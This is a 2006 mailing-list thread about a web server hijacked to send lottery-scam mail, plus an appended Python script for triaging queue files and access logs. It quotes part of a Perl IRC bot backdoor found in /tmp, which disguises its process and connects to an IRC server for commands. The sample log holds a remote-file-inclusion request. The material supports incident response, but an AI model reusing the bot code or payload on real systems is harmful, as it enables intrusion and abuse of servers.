-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Tue, 23 May 2006 13:11:46 +0100
Paul Howarth <paul@xxxxxxxxxxxx> wrote:

> CodeHeads wrote:
> >> There is something wrong but I cannot nail it down.
> >>
> >> I am receiving hundreds of bounce-backs from the web server I am
> >> running. Not sure how they are sending mail. The only mail that should
> >> be sent is from forms. Here is the header of one of the queue files.
> >> Maybe someone has run into this.
> >>
> >> V8
> >> T1147739033
> >> K1147739138
> >> N1
> >> P34672
> >> Mhost map: lookup (zdnetmail.com): deferred
> >> F8bs
> >> $_apache@localhost
> >> ${daemon_flags}c u
> >> Sapache
> >> Aapache@xxxxxxxxxxxxxx
> >> rRFC822; galactica7@xxxxxxxxxxxxx
> >> RPFD:galactica7@xxxxxxxxxxxxx
> >> H?P?Return-Path: <<81>g>
> >> H??Received: (from apache@localhost)
> >>         by code-heads.com (8.13.4/8.13.4/Submit) id k4G0NrpQ017524;
> >>         Mon, 15 May 2006 20:23:53 -0400
> >> H?D?Date: Mon, 15 May 2006 20:23:53 -0400
> >> H?x?Full-Name: Apache
> >> H?M?Message-Id: <200605160023.k4G0NrpQ017524@xxxxxxxxxxxxxx>
> >> H??To: galactica7@xxxxxxxxxxxxx
> >> H??Subject: WINNING NOTIFICATION
> >> H??From: NATIONAL LOTTERY <claimsagent_2006_2007@xxxxxxxxxxx>
> >>
> >> What is bothering me is this:
> >> by code-heads.com (8.13.4/8.13.4/**Submit**) id k4G0NrpQ017524;
>
> Right, that should tell you that the mail headers you are looking at
> seem to be generated by something running as user apache (probably a
> CGI/PHP script of some kind running via your web server), which is
> calling the local sendmail on that server to send the mail out. It's
> nothing to do with postfix at all.
>
> > Sorry again, but looky what I found in the /tmp dir:
> > The whole thing is not copied and pasted:
> >
> > #!/usr/bin/perl
> > # r00t teh pl4net!
> > # gr33t t0 Myhack@DALnet
> > # ------[eof]-----
> >
> > system("kill -9 `ps ax |grep /var/tmp/wops/is |grep -v grep|awk '{print $1;}'`");
> >
> > my $processo = 'httpd';
> >
> > # morgan the code that you need to rip ends here
> >
> > my @titi = ("Cube-|");
> >
> > my $sleep='5';
> > my $linas_max='4';
> > my @adms=("apaii","KingFighter");
> > my @hostauth=("roundtable.cif.rochester.edu","202.142.215.209");
> > my @canais=("#conn");
> > my $nick= $titi[rand scalar @titi];
> > my $ircname = $titi[rand scalar @titi];
> > chop (my $realname = $titi[rand scalar @titi]);
> >
> > $servidor='rumble.dal.net' unless $servidor;
> > my $porta='6667';
> > my $VERSAO = '0.5';
> > $SIG{'INT'} = 'IGNORE';
> > $SIG{'HUP'} = 'IGNORE';
> > $SIG{'TERM'} = 'IGNORE';
> > $SIG{'CHLD'} = 'IGNORE';
> > $SIG{'PS'} = 'IGNORE';
> > use IO::Socket;
> > use Socket;
> > use IO::Select;
> > chdir("/");
> > $servidor="$ARGV[0]" if $ARGV[0];
> > $0="$processo"."\0"x16;;
> > my $pid=fork;
> > exit if $pid;
> > die "Problema com o fork: $!" unless defined($pid);
> >
> > our %irc_servers;
> > our %DCC;
> > my $dcc_sel = new IO::Select->new();
> >
> > $sel_cliente = IO::Select->new();
> > sub sendraw {
> >     if ($#_ == '1') {
> >         my $socket = $_[0];
> >         print $socket "$_[1]\n";
> >     } else {
> >         print $IRC_cur_socket "$_[0]\n";
> >     }
> > }
> >
> > sub conectar {
> >     my $meunick = $_[0];
> >     my $servidor_con = $_[1];
> >     my $porta_con = $_[2];
> >
> >     my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp",
> >         PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
> >     if (defined($IRC_socket)) {
> >         $IRC_cur_socket = $IRC_socket;
> >
> > What I cannot understand is how someone can upload to the tmp dir. I
> > guess I am still learning. Can someone shed some light on this?
>
> This is communicating with an IRC server, probably to listen for commands.
>
> Look at the owner of the script. If it's apache, you can safely say that
> a webserver exploit was used to upload it. You could try looking at the
> timestamp of the file, and look in your web server log files for
> suspicious activity at around that time to get a clue as to how it got
> there.
>
> If you have /tmp on a separate partition, I'd seriously consider
> mounting it noexec,nodev. If it's not a separate partition, I'd
> seriously consider making one for it on an Internet-exposed web server.
> Same goes for /var.
>
> Paul.

That has since been removed and the system redone. I have been keeping an
eye on /tmp and /var/tmp.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFEczbFfw3TK8jhZrsRAhN/AKDjZlDh+0bV++6XvBfWHBOVTZdIQQCgoVGJ
Unhz/IKmEViCNj3G+YzEZdk=
=T6xG
-----END PGP SIGNATURE-----
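The two checks Paul suggests in the thread, scripted as an added example (this is not code from the thread or from either poster): first, read a sendmail qf queue file like the one CodeHeads posted and confirm from the S line, the $_ line and the "Submit" Received header that the message was injected locally by the web server's account rather than arriving over SMTP; second, take the dropped file's mtime and pull the web-server requests that happened in a window around it. Everything in the block is constructed: the queue file is a copy of the posted one with recipient and sender addresses replaced by example domains, the access-log lines and the file timestamp are made up, and the "suspicious request" filter (POSTs, and query strings that pull in a remote URL or mention /tmp) is my own heuristic, not something the thread establishes about this intrusion.

```python
"""Triage helpers for the case above: (1) decide from a sendmail qf queue
file whether a message was injected locally by the web server's user, and
(2) list web-server requests made around the dropped file's mtime.
All input is constructed; nothing here reads the real spool or logs."""
import re
from datetime import datetime, timedelta, timezone

# Constructed: the qf file from the thread with addresses replaced by example
# domains. Folded header lines start with a tab, as they do in a real qf file.
QF_SAMPLE = """V8
T1147739033
Mhost map: lookup (zdnetmail.com): deferred
$_apache@localhost
${daemon_flags}c u
Sapache
Aapache@code-heads.example
rRFC822; victim@example.net
RPFD:victim@example.net
H?P?Return-Path: <g>
H??Received: (from apache@localhost)
\tby code-heads.com (8.13.4/8.13.4/Submit) id k4G0NrpQ017524;
\tMon, 15 May 2006 20:23:53 -0400
H?D?Date: Mon, 15 May 2006 20:23:53 -0400
H?x?Full-Name: Apache
H??To: victim@example.net
H??Subject: WINNING NOTIFICATION
H??From: NATIONAL LOTTERY <claimsagent@example.org>
"""

def parse_qf(text):
    """Parse the subset of sendmail qf records needed for triage."""
    rec = {"headers": {}, "recipients": []}
    cur = None  # name of the header a folded continuation line belongs to
    for line in text.splitlines():
        if not line:
            continue
        if line[0] in " \t" and cur:            # folded header continuation
            rec["headers"][cur] += " " + line.strip()
            continue
        code, rest = line[0], line[1:]
        if code == "S":                          # envelope sender
            rec["sender"] = rest
        elif code == "$" and rest.startswith("_"):   # $_ = auth info (user@host)
            rec["auth"] = rest[1:]
        elif code == "T":                        # creation time, epoch seconds
            rec["created"] = datetime.fromtimestamp(int(rest), timezone.utc)
        elif code == "R":                        # final recipient (flags:addr)
            rec["recipients"].append(rest.split(":", 1)[-1])
        elif code == "H":                        # H?flags?Name: value
            m = re.match(r"\?[^?]*\?(.*)", rest)
            name, _, value = (m.group(1) if m else rest).partition(":")
            cur = name.strip()
            rec["headers"][cur] = value.strip()
    return rec

WEB_USERS = {"apache", "www-data", "httpd", "nobody"}   # assumption: typical web accounts

def web_submitted(rec):
    """True when the envelope names a web-server account AND the first Received
    header shows a local sendmail submission ("(from apache@localhost)" via the
    "Submit" configuration) rather than an SMTP connection from outside."""
    auth_user = rec.get("auth", "").split("@")[0]
    by_user = rec.get("sender", "") in WEB_USERS or auth_user in WEB_USERS
    received = rec["headers"].get("Received", "")
    local_submit = "/Submit)" in received and "@localhost)" in received
    return by_user and local_submit

# Common Log Format: ip ident user [timestamp] "request" status size
CLF = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')

def parse_clf(line):
    m = CLF.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "req": m["req"], "status": int(m["status"]),
            "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")}

def requests_near(log_lines, when, window=timedelta(minutes=10)):
    """Requests whose timestamp lies within `window` of `when`, oldest first."""
    hits = [e for e in map(parse_clf, log_lines) if e and abs(e["ts"] - when) <= window]
    return sorted(hits, key=lambda e: e["ts"])

def suspicious(entries):
    """Heuristic (my assumption, not from the thread): open these first --
    POSTs, and requests whose query string pulls in a remote URL or names /tmp."""
    out = []
    for e in entries:
        method, _, target = e["req"].partition(" ")
        if method == "POST" or "=http" in target or "/tmp/" in target:
            out.append(e)
    return out

# Constructed access-log lines; only three fall inside the ten-minute window.
ACCESS_LOG = [
    '203.0.113.7 - - [15/May/2006:19:50:12 -0400] "GET /index.php?page=news HTTP/1.1" 200 4801',
    '203.0.113.7 - - [15/May/2006:20:10:02 -0400] "GET /index.php?page=about HTTP/1.1" 200 5120',
    '198.51.100.23 - - [15/May/2006:20:14:31 -0400] "GET /index.php?page=http://198.51.100.23/x.txt? HTTP/1.1" 200 812',
    '198.51.100.23 - - [15/May/2006:20:14:40 -0400] "POST /contact.php HTTP/1.1" 200 37',
    '203.0.113.7 - - [15/May/2006:21:30:00 -0400] "GET /about.html HTTP/1.1" 200 2100',
]
# Constructed stand-in for datetime.fromtimestamp(os.stat(path).st_mtime, timezone.utc)
DROP_TIME = datetime(2006, 5, 15, 20, 15, 5, tzinfo=timezone(timedelta(hours=-4)))

if __name__ == "__main__":
    rec = parse_qf(QF_SAMPLE)
    print("locally submitted by web user:", web_submitted(rec),
          "| to:", rec["recipients"], "| subject:", rec["headers"]["Subject"])
    for e in suspicious(requests_near(ACCESS_LOG, DROP_TIME)):
        print(e["ts"].isoformat(), e["ip"], e["req"])
```

In practice you would feed parse_qf() the qf* files from the sendmail spool and requests_near() the Apache access log, with DROP_TIME taken from the mtime of the file found in /tmp; the ten-minute window is a starting point, and on a busy server the suspicious() filter is what keeps the output readable. Note that the T record in the posted queue file (1147739033) decodes to the same instant as the Received header's "Mon, 15 May 2006 20:23:53 -0400", which is a useful cross-check that the file has not been tampered with.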